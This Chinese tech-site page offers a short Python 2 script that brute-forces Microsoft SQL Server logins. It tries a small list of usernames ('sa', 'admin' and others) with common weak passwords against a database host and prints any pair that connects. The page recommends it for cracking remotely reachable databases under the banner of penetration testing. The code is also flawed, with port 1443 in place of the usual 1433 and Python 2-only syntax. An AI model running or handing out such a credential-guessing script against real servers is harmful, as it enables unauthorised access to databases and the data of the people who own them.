服务器之家:专注于服务器技术及软件下载分享
分类导航

Mysql|Sql Server|Oracle|Redis|MongoDB|PostgreSQL|Sqlite|DB2|mariadb|Access|数据库技术|

服务器之家 - 数据库 - Sql Server - Python版Mssql爆破小脚本

Python版Mssql爆破小脚本

2020-05-11 15:21MSSQL教程网 Sql Server

本文给大家分享的是使用Python实现的暴力破解mssql用户密码的脚本的代码,配合上合适的字典非常好用,有需要的小伙伴可以参考下

Mssql Python版本爆破小脚本,需要安装 MSSQL-python.exe 可以看出代码量很少,用法:保存代码为MssqlDatabaseBlasting.py,cmd切换到 MssqlDatabaseBlasting.py路径下,并 执行 MssqlDatabaseBlasting.py即可开始破解

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import pymssql
common_weak_password = ('','123456','test','root','admin','user')#密码字典
mssql_username = ('sa', 'test', 'admin', 'mssql')#账号字典
 
success = False
host = "127.0.0.1"#数据库IP地址
port = 1443
for username in mssql_username:
  for password in common_weak_password:
    try:
      db = pymssql.connect(server=host, port=port, user=username, password=password)
      success = True
      if success:
        print username, password
    except Exception, e:
      pass

说明:看到很多网络安全爱好者,在进行渗透测试的时候,遇到数据库可以远程管理,但是无法破解其账号密码,所以此篇文章就推送几个脚本进行渗透。

  • Python
  • MSSQL

    • 延伸 · 阅读

    精彩推荐
    最近更新
    编辑推荐
    阅读排行
    热门标签
    2005   18052   3456   1355   29506   9003   5120   21002   5173   15138   15404   功能语句   去零函数   from   字符串聚合   备份记录   增长情况   多行记录   逻辑查询   实用语句   数据一致性   日期查询   字段编号   约束增强   行列转换   @@ERROR   日志备份   分组统计   已经存在   numeric  
    © 2019-2022 服务器之家(www.tuohang.net) 版权所有关于我们联系我们版权申明网站地图